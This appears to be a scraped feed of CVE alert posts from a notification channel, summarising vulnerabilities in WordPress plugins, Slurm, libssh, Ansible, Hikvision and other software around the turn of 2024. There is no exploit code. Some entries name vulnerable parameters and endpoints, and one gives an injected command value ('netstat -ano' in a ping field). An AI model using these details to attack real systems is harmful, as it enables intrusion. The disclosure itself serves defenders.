🚨 CVE-2023-6918A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.🎖@cveNotify |
|
| 2024-01-03 07:37:25 |
🚨 CVE-2023-47473Directory Traversal vulnerability in fuwushe.org iFair versions 23.8_ad0 and before allows an attacker to obtain sensitive information via a crafted script.🎖@cveNotify |
|
| 2024-01-03 06:37:30 |
🚨 CVE-2023-6981The WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to SQL Injection via the 'group_id' parameter in all versions up to, and including, 6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can leveraged to achieve Reflected Cross-site Scripting.🎖@cveNotify |
|
| 2024-01-03 06:37:26 |
🚨 CVE-2023-6600The OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy. plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting due to a missing capability check on the update_settings() function hooked via admin_init in all versions up to, and including, 5.7.9. This makes it possible for unauthenticated attackers to update the plugin's settings which can be used to inject Cross-Site Scripting payloads and delete entire directories. PLease note there were several attempted patched, and we consider 5.7.10 to be the most sufficiently patched.🎖@cveNotify |
|
| 2024-01-03 06:37:25 |
🚨 CVE-2023-3812An out-of-bounds memory access flaw was found in the Linux kernel’s TUN/TAP device driver functionality in how a user generates a malicious (too big) networking packet when napi frags is enabled. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-03 05:37:25 |
🚨 CVE-2023-6629The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘msg’ parameter in all versions up to, and including, 2.8.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-03 05:37:24 |
🚨 CVE-2023-46308In Plotly plotly.js before 2.25.2, plot API calls have a risk of __proto__ being polluted in expandObjectPaths or nestedProperty.🎖@cveNotify |
|
| 2024-01-03 05:07:25 |
🚨 CVE-2023-7134A vulnerability was found in SourceCodester Medicine Tracking System 1.0. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument page leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249137 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-03 03:37:32 |
🚨 CVE-2023-49938An issue was discovered in SchedMD Slurm 22.05.x and 23.02.x. There is Incorrect Access Control: an attacker can modified their extended group list that is used with the sbcast subsystem, and open files with an unauthorized set of extended groups. The fixed versions are 22.05.11 and 23.02.7.🎖@cveNotify |
|
| 2024-01-03 03:37:26 |
🚨 CVE-2023-49937An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. Because of a double free, attackers can cause a denial of service or possibly execute arbitrary code. The fixed versions are 22.05.11, 23.02.7, and 23.11.1.🎖@cveNotify |
|
| 2024-01-03 03:37:25 |
🚨 CVE-2023-49934An issue was discovered in SchedMD Slurm 23.11.x. There is SQL Injection against the SlurmDBD database. The fixed version is 23.11.1.🎖@cveNotify |
|
| 2024-01-03 03:37:24 |
🚨 CVE-2023-49933An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. There is Improper Enforcement of Message Integrity During Transmission in a Communication Channel. This allows attackers to modify RPC traffic in a way that bypasses message hash checks. The fixed versions are 22.05.11, 23.02.7, and 23.11.1.🎖@cveNotify |
|
| 2024-01-03 03:07:25 |
🚨 CVE-2023-43116A symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script.🎖@cveNotify |
|
| 2024-01-03 03:07:24 |
🚨 CVE-2023-4256Within tcpreplay's tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack.🎖@cveNotify |
|
| 2024-01-03 02:37:37 |
🚨 CVE-2023-50351HCL DRYiCE MyXalytics is impacted by the use of an insecure key rotation mechanism which can allow an attacker to compromise the confidentiality or integrity of data.🎖@cveNotify |
|
| 2024-01-03 02:37:36 |
🚨 CVE-2023-50346HCL DRYiCE MyXalytics is impacted by an information disclosure vulnerability. Certain endpoints within the application disclose detailed file information.🎖@cveNotify |
|
| 2024-01-03 02:37:31 |
🚨 CVE-2023-41780There is an unsafe DLL loading vulnerability in ZTE ZXCLOUD iRAI. Due to the program failed to adequately validate the user's input, an attacker could exploit this vulnerability to escalate local privileges.🎖@cveNotify |
|
| 2024-01-03 02:37:30 |
🚨 CVE-2023-41776There is a local privilege escalation vulnerability of ZTE's ZXCLOUD iRAI.Attackers with regular user privileges can create a fake process, and to escalate local privileges.🎖@cveNotify |
|
| 2024-01-03 02:37:26 |
🚨 CVE-2023-49391An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message.🎖@cveNotify |
|
| 2024-01-03 02:37:25 |
🚨 CVE-2023-4255An out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition.🎖@cveNotify |
|
| 2024-01-03 02:07:26 |
🚨 CVE-2023-7101Spreadsheet::ParseExcel version 0.65 is a Perl module used for parsing Excel files. Spreadsheet::ParseExcel is vulnerable to an arbitrary code execution (ACE) vulnerability due to passing unvalidated input from a file into a string-type “eval”. Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic.🎖@cveNotify |
|
| 2024-01-03 02:07:25 |
🚨 CVE-2023-7024Heap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-03 00:37:26 |
🚨 CVE-2023-49557An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component.🎖@cveNotify |
|
| 2024-01-03 00:37:25 |
🚨 CVE-2023-49554Use After Free vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component.🎖@cveNotify |
|
| 2024-01-02 23:37:30 |
🚨 CVE-2023-49553An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the msj.c file.🎖@cveNotify |
|
| 2024-01-02 23:37:25 |
🚨 CVE-2023-49550An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component.🎖@cveNotify |
|
| 2024-01-02 23:37:24 |
🚨 CVE-2023-48418In checkDebuggingDisallowed of DeviceVersionFragment.java, there is a possible way to access adb before SUW completion due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation🎖@cveNotify |
|
| 2024-01-02 21:07:26 |
🚨 CVE-2023-5991The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server🎖@cveNotify |
|
| 2024-01-02 21:07:25 |
🚨 CVE-2022-47532FileRun 20220519 allows SQL Injection via the "dir" parameter in a /?module=users§ion=cpanel&page=list request.🎖@cveNotify |
|
| 2024-01-02 21:07:24 |
🚨 CVE-2023-50822Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Currency.Wiki Currency Converter Widget – Exchange Rates allows Stored XSS.This issue affects Currency Converter Widget – Exchange Rates: from n/a through 3.0.2.🎖@cveNotify |
|
| 2024-01-02 20:07:33 |
🚨 CVE-2023-49598Stored cross-site scripting vulnerability exists in the event handlers of the pre tags in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product.🎖@cveNotify |
|
| 2024-01-02 20:07:26 |
🚨 CVE-2023-48670Dell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges.🎖@cveNotify |
|
| 2024-01-02 20:07:25 |
🚨 CVE-2023-40338Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier displays an error message that includes an absolute path of a log file when attempting to access the Scan Organization Folder Log if no logs are available, exposing information about the Jenkins controller file system.🎖@cveNotify |
|
| 2024-01-02 19:07:24 |
🚨 CVE-2023-50724Resque (pronounced like "rescue") is a Redis-backed library for creating background jobs, placing those jobs on multiple queues, and processing them later. resque-web in resque versions before 2.1.0 are vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint. This issue has been patched in version 2.1.0.🎖@cveNotify |
|
| 2024-01-02 18:37:25 |
🚨 CVE-2023-2585Keycloak's device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client.🎖@cveNotify |
|
| 2024-01-02 18:37:24 |
🚨 CVE-2023-7025A vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-02 18:07:26 |
🚨 CVE-2023-51656Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4.Users are recommended to upgrade to version 1.2.2, which fixes the issue.🎖@cveNotify |
|
| 2024-01-02 18:07:25 |
🚨 CVE-2023-7026A vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579.🎖@cveNotify |
|
| 2024-01-02 17:07:25 |
🚨 CVE-2023-46131Grails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0.🎖@cveNotify |
|
| 2024-01-02 16:07:25 |
🚨 CVE-2023-44982Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina).This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5.🎖@cveNotify |
|
| 2024-01-02 16:07:24 |
🚨 CVE-2023-6918A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.🎖@cveNotify |
|
| 2024-01-02 15:07:25 |
🚨 CVE-2023-27172Xpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack.🎖@cveNotify |
|
| 2024-01-02 14:37:33 |
🚨 CVE-2023-45121Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'desc' parameter of the /update.php?q=addquiz resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-02 14:37:32 |
🚨 CVE-2023-45118Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'fdid' parameter of the /update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-02 14:37:28 |
🚨 CVE-2023-45117Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'eid' parameter of the /update.php?q=rmquiz resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-02 14:37:27 |
🚨 CVE-2023-45887DS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client's machine via a modified GPCM message.🎖@cveNotify |
|
| 2024-01-02 14:37:26 |
🚨 CVE-2023-49147An issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe.🎖@cveNotify |
|
| 2024-01-02 14:07:39 |
🚨 CVE-2023-6485The Html5 Video Player WordPress plugin before 2.5.19 does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins🎖@cveNotify |
|
| 2024-01-02 14:07:32 |
🚨 CVE-2023-6271The Backup Migration WordPress plugin before 1.3.6 stores in-progress backups information in easy to find, publicly-accessible files, which may allow attackers monitoring those to leak sensitive information from the site's backups.🎖@cveNotify |
|
| 2024-01-02 14:07:31 |
🚨 CVE-2023-6037The WP TripAdvisor Review Slider WordPress plugin before 11.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-01-02 14:07:27 |
🚨 CVE-2023-6000The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.🎖@cveNotify |
|
| 2024-01-02 14:07:26 |
🚨 CVE-2023-49006Cross Site Request Forgery (CSRF) vulnerability in Phpsysinfo version 3.4.3 allows a remote attacker to obtain sensitive information via a crafted page in the XML.php file.🎖@cveNotify |
|
| 2024-01-02 13:37:25 |
🚨 CVE-2023-6314Stack-based buffer overflow in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file.🎖@cveNotify |
|
| 2024-01-02 13:37:24 |
🚨 CVE-2023-6895A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-02 10:37:26 |
🚨 CVE-2023-7172A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Dashboard. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249356.🎖@cveNotify |
|
| 2024-01-02 09:37:25 |
🚨 CVE-2023-6277An out-of-memory flaw was found in libtiff. Passing a crafted tiff file to TIFFOpen() API may allow a remote attacker to cause a denial of service via a craft input with size smaller than 379 KB.🎖@cveNotify |
|
| 2024-01-02 08:37:26 |
🚨 CVE-2023-49135in OpenHarmony v3.2.2 and prior versions allow a local attacker cause multimedia player crash through modify a released pointer.🎖@cveNotify |
|
| 2024-01-02 08:37:25 |
🚨 CVE-2023-47216in OpenHarmony v3.2.2 and prior versions allow a local attacker cause DOS through occupy all resources🎖@cveNotify |
|
| 2024-01-02 06:37:32 |
🚨 CVE-2023-33033Memory corruption in Audio during playback with speaker protection.🎖@cveNotify |
|
| 2024-01-02 06:37:26 |
🚨 CVE-2023-33032Memory corruption in TZ Secure OS while requesting a memory allocation from TA region.🎖@cveNotify |
|
| 2024-01-02 06:37:25 |
🚨 CVE-2023-33014Information disclosure in Core services while processing a Diag command.🎖@cveNotify |
|
| 2024-01-02 06:37:24 |
🚨 CVE-2023-28583Memory corruption when IPv6 prefix timer object`s lifetime expires which are created while Netmgr daemon gets an IPv6 address.🎖@cveNotify |
|
| 2024-01-02 05:37:25 |
🚨 CVE-2023-26159Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches.🎖@cveNotify |
|
| 2024-01-02 05:37:24 |
🚨 CVE-2023-26157Versions of the package libredwg before 0.12.5.6384 are vulnerable to Denial of Service (DoS) due to an out-of-bounds read involving section->num_pages in decode_r2007.c.🎖@cveNotify |
|
| 2024-01-02 03:37:38 |
🚨 CVE-2023-32882In battery, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308616.🎖@cveNotify |
|
| 2024-01-02 03:37:32 |
🚨 CVE-2023-32881In battery, there is a possible information disclosure due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308080.🎖@cveNotify |
|
| 2024-01-02 03:37:31 |
🚨 CVE-2023-32878In battery, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08307992.🎖@cveNotify |
|
| 2024-01-02 03:37:30 |
🚨 CVE-2023-32877In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308070.🎖@cveNotify |
|
| 2024-01-02 03:37:26 |
🚨 CVE-2023-32875In keyInstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308607; Issue ID: ALPS08304217.🎖@cveNotify |
|
| 2024-01-02 03:37:25 |
🚨 CVE-2023-32831In wlan driver, there is a possible PIN crack due to use of insufficiently random values. This could lead to local information disclosure with no execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00325055; Issue ID: MSV-868.🎖@cveNotify |
|
| 2024-01-02 01:37:24 |
🚨 CVE-2023-40303GNU inetutils before 2.5 may allow privilege escalation because of unchecked return values of set*id() family functions in ftpd, rcp, rlogin, rsh, rshd, and uucpd. This is, for example, relevant if the setuid system call fails when a process is trying to drop privileges before letting an ordinary user control the activities of the process.🎖@cveNotify |
|
| 2024-01-02 00:37:25 |
🚨 CVE-2024-0184A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/edit_teacher.php of the component Add Enginer. The manipulation of the argument Firstname/Lastname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249442 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-01 23:37:25 |
🚨 CVE-2023-4380A logic flaw exists in Ansible Automation platform. Whenever a private project is created with incorrect credentials, they are logged in plaintext. This flaw allows an attacker to retrieve the credentials from the log, resulting in the loss of confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2024-01-01 21:37:24 |
🚨 CVE-2023-5764A template injection flaw was found in Ansible where a user's controller internal templating operations may remove the unsafe designation from template data. This issue could allow an attacker to use a specially crafted file to introduce code injection when supplying templating data.🎖@cveNotify |
|
| 2024-01-01 15:25:00 |
🚨 CVE-2023-6485The Html5 Video Player WordPress plugin before 2.5.19 does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins🎖@cveNotify |
|
| 2024-01-01 15:24:56 |
🚨 CVE-2023-6421The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.🎖@cveNotify |
|
| 2024-01-01 15:24:53 |
🚨 CVE-2023-6271The Backup Migration WordPress plugin before 1.3.6 stores in-progress backups information in easy to find, publicly-accessible files, which may allow attackers monitoring those to leak sensitive information from the site's backups.🎖@cveNotify |
|
| 2024-01-01 15:24:52 |
🚨 CVE-2023-6113The WP STAGING WordPress Backup Plugin before 3.1.3 and WP STAGING Pro WordPress Backup Plugin before 5.1.3 do not prevent visitors from leaking key information about ongoing backups processes, allowing unauthenticated attackers to download said backups later.🎖@cveNotify |
|
| 2024-01-01 15:24:50 |
🚨 CVE-2023-6064The PayHere Payment Gateway WordPress plugin before 2.2.12 automatically creates publicly-accessible log files containing sensitive information when transactions occur.🎖@cveNotify |
|
| 2024-01-01 15:24:47 |
🚨 CVE-2023-6037The WP TripAdvisor Review Slider WordPress plugin before 11.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-01-01 15:24:43 |
🚨 CVE-2023-6000The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.🎖@cveNotify |
|
| 2024-01-01 15:24:40 |
🚨 CVE-2023-5877The affiliate-toolkit WordPress plugin before 3.4.3 lacks authorization and authentication for requests to it's affiliate-toolkit-starter/tools/atkp_imagereceiver.php endpoint, allowing unauthenticated visitors to make requests to arbitrary URL's, including RFC1918 private addresses, leading to a Server Side Request Forgery (SSRF) issue.🎖@cveNotify |
|
| 2024-01-01 05:27:08 |
🎖@cveNotify |
Images
|
| 2024-01-01 02:25:50 |
🚨 CVE-2023-50550layui up to v2.74 was discovered to contain a cross-site scripting (XSS) vulnerability via the data-content parameter.🎖@cveNotify |
|
| 2024-01-01 02:25:42 |
🚨 CVE-2023-7175A vulnerability was found in Campcodes Online College Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/borrow_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249362 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-01 02:25:40 |
🚨 CVE-2023-7173A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-01 02:25:38 |
🚨 CVE-2018-25096A vulnerability was found in MdAlAmin-aol Own Health Record 0.1-alpha/0.2-alpha/0.3-alpha/0.3.1-alpha. It has been rated as problematic. This issue affects some unknown processing of the file includes/logout.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 0.4-alpha is able to address this issue. The patch is named 58b413aa40820b49070782c786c526850ab7748f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249191.🎖@cveNotify |
|
| 2024-01-01 02:25:37 |
🚨 CVE-2023-7172A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Dashboard. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249356.🎖@cveNotify |
|
| 2024-01-01 02:25:35 |
🚨 CVE-2023-52257LogoBee 0.2 allows updates.php?id= XSS.🎖@cveNotify |
|
| 2024-01-01 02:25:34 |
🚨 CVE-2023-52252Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint.🎖@cveNotify |
|
| 2024-01-01 02:25:28 |
🚨 CVE-2023-38023An issue was discovered in SCONE Confidential Computing Platform before 5.8.0 for Intel SGX. Lack of pointer-alignment logic in __scone_dispatch and other entry functions allows a local attacker to access unauthorized information, aka an "AEPIC Leak."🎖@cveNotify |
|
| 2024-01-01 02:25:20 |
🚨 CVE-2023-38022An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.29 for Intel SGX. Insufficient pointer validation allows a local attacker to access unauthorized information. This relates to strlen and sgx_is_within_user.🎖@cveNotify |
|
| 2024-01-01 02:25:13 |
🚨 CVE-2023-38021An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.32 for Intel SGX. Lack of pointer-alignment validation logic in entry functions allows a local attacker to access unauthorized information. This relates to the enclave_ecall function and system call layer.🎖@cveNotify |
|
| 2024-01-01 02:25:11 |
🚨 CVE-2022-46487Improper initialization of x87 and SSE floating-point configuration registers in the __scone_entry component of SCONE before 5.8.0 for Intel SGX allows a local attacker to compromise the execution integrity of floating-point operations in an enclave or access sensitive information via side-channel analysis.🎖@cveNotify |
|
| 2024-01-01 02:25:06 |
🚨 CVE-2022-46486A lack of pointer-validation logic in the __scone_dispatch component of SCONE before v5.8.0 for Intel SGX allows attackers to access sensitive information.🎖@cveNotify |
|
| 2024-01-01 02:25:05 |
🚨 CVE-2023-41543SQL injection vulnerability in jeecg-boot v3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the component /sys/replicate/check.🎖@cveNotify |
|
| 2024-01-01 02:25:04 |
🚨 CVE-2023-41542SQL injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the jmreport/qurestSql component.🎖@cveNotify |
|
| 2024-01-01 02:25:01 |
🚨 CVE-2023-50559An issue was discovered in XiangShan v2.1, allows local attackers to obtain sensitive information via the L1D cache.🎖@cveNotify |
|
| 2024-01-01 02:25:00 |
🚨 CVE-2023-52240The Kantega SAML SSO OIDC Kerberos Single Sign-on apps before 6.20.0 for Atlassian products allow XSS if SAML POST Binding is enabled. This affects 4.4.2 through 4.14.8 before 4.14.9, 5.0.0 through 5.11.4 before 5.11.5, and 6.0.0 through 6.19.0 before 6.20.0. The full product names are Kantega SAML SSO OIDC Kerberos Single Sign-on for Jira Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Confluence Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bitbucket Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bamboo Data Center & Server (Kantega SSO Enterprise), and Kantega SAML SSO OIDC Kerberos Single Sign-on for FeCru Server (Kantega SSO Enterprise). (Here, FeCru refers to the Atlassian Fisheye and Crucible products running together.)🎖@cveNotify |
|
| 2024-01-01 02:24:58 |
🚨 CVE-2023-50071Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name.🎖@cveNotify |
|
| 2024-01-01 02:24:55 |
🚨 CVE-2023-50070Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject.🎖@cveNotify |
|
| 2024-01-01 02:24:54 |
🚨 CVE-2023-50069WireMock with GUI versions 3.2.0.0 through 3.0.4.0 are vulnerable to stored cross-site scripting (SXSS) through the recording feature. An attacker can host a malicious payload and perform a test mapping pointing to the attacker's file, and the result will render on the Matched page in the Body area, resulting in the execution of the payload. This occurs because the response body is not validated or sanitized.🎖@cveNotify |
|
| 2023-12-31 19:24:40 |
🚨 CVE-2020-16984Azure Sphere Unsigned Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-31 19:24:34 |
🚨 CVE-2020-16983Azure Sphere Tampering Vulnerability🎖@cveNotify |
|
| 2023-12-31 19:24:33 |
🚨 CVE-2020-16979Microsoft SharePoint Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-31 19:24:32 |
🚨 CVE-2020-16970Azure Sphere Unsigned Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-31 18:24:40 |
🚨 CVE-2020-16963Windows Backup Engine Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-31 18:24:33 |
🚨 CVE-2020-16960Windows Backup Engine Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-31 18:24:32 |
🚨 CVE-2020-16958Windows Backup Engine Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-31 17:24:33 |
🚨 CVE-2023-7193A vulnerability was found in MTab Bookmark up to 1.2.6 and classified as critical. This issue affects some unknown processing of the file public/install.php of the component Installation. The manipulation leads to improper access controls. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249395. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-31 17:24:32 |
🚨 CVE-2023-52134Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Eyal Fitoussi GEO my WordPress.This issue affects GEO my WordPress: from n/a through 4.0.2.🎖@cveNotify |
|
| 2023-12-31 16:24:32 |
🚨 CVE-2023-7190A vulnerability, which was classified as critical, has been found in S-CMS up to 2.0_build20220529-20231006. Affected by this issue is some unknown functionality of the file /member/ad.php?action=ad. The manipulation of the argument A_text/A_url/A_contact leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249392. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-31 15:24:32 |
